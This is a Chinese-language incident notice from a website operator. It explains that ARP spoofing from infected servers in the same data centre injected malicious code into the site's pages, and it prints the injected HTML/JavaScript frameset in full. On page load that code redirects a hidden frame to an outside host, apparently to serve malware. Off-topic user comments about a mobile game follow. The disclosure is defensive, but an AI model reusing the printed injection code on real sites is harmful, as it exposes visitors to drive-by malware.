關于最近服務器被ARP攻擊的(de)說明

從昨天下午開始,我們的(de)新服務器一(yī)直不穩定,并且在頁面上發現了惡意代碼,剛開始我們以為(wèi)是服務器被黑客攻陷了,但經過排查并未發現服務器異常;後來經過調查,才知道(dào)原因竟然是我們的(de)新服務器所在機房 – 浙江溫州電信IDC機房2台服務器感染了ARP病毒,然後它們給我站服務器發送ARP欺騙數據包,導緻我們網站上面的(de)所有頁面在傳輸過程中均被植入以下惡意代碼:

<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf(“CK”);
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie=”CK=test;expires=”+EP.toGMTString();
self.hi.location=”http://ff.best320.info:171/360/index.html?id=7003″;}
}
</script>
<frameset rows=”100%,*” onLoad=”showme()”>
<frame name=”hello” src=”/ifd?UpdatedPage=aGlqYWNr”>
<frame name=”hi” src=””>
</frameset>
</html>

經過我們的(de)技術人員測試之後,确定為(wèi)ARP攻擊所造成惡意代碼被植入我們的(de)頁面!
于是我們緊急購置了專業級的(de)ARP防火牆,目前已經成功抵禦了攻擊。

這讓我不得不對ARP攻擊多了一(yī)份“敬畏”,這樣竟然可(kě)以在頁面裏面挂馬!!
直至現在,機房竟然還未将感染ARP病毒的(de)服務器做(zuò)隔離(lí)處理(lǐ)!

此外,我們向廣大用戶鄭重承諾:我們絕對不會在本站的(de)任何頁面內(nèi)植入惡意代碼!如(rú)果用戶在訪問本站時被提示發現惡意代碼,很有可(kě)能是殺毒軟件誤報本站被黑客攻陷後被植入惡意代碼,如(rú)果遇到後面這種情況,24小時之內(nèi)勿再次嘗試登陸,請立即全面殺毒。如(rú)果服務器被攻陷,我們會立即盡快解決,必要時會向網絡公安報案處理(lǐ)

文章(zhāng)标簽:,

目前有14條評論 。

  1. 12說道(dào):

    為(wèi)什麽魔界上不了

  2. 12說道(dào):

    但是象我們這樣很喜歡魔界的(de)人真的(de)很想在這玩,這網站還是不錯的(de),流量真的(de)很快用完。謝謝

  3. 12說道(dào):

    我也可(kě)以幫你們宣傳,那裏面很多人都不知道(dào),他們還用錢去(qù)求購電腦上的(de)

  4. 12說道(dào):

    可(kě)以開啓魔界嗎,我希望睡個覺,這個夢想可(kě)以實現,謝謝

  5. 魔界說道(dào):

    什麽時候可(kě)以上魔界啊

  6. 空間說道(dào):

    是不是電腦上幻想被封了,今天一(yī)直上不了

  7. CGVC說道(dào):

    網管啊,這網站的(de)魔界是不是被封了啊,快調整下

  8. HAO說道(dào):

    我是玩魔界的(de)啊 趕緊弄啊

  9. hvggggggggv說道(dào):

    歡迎來到魔界,請您使用手機進行訪問。
    UCWEB用戶請關閉服務器中轉選項,選擇WAP直連
    如(rú)果還有問題請聯系客服中心,客服電話:010-63168058
    這是怎麽回事啊

  10. f1194361820說道(dào):

    我怎麽不能登陸wap網遊輪回oline

  11. 祂丶仰視(shì)45度說道(dào):

    怎麽手機WAP網遊輪回一(yī)進遊戲就出現這個提示無法進入
    請使用手機訪問本遊戲,謝謝合作!(IP:119.62.128.38)
    有什麽辦法解決麽?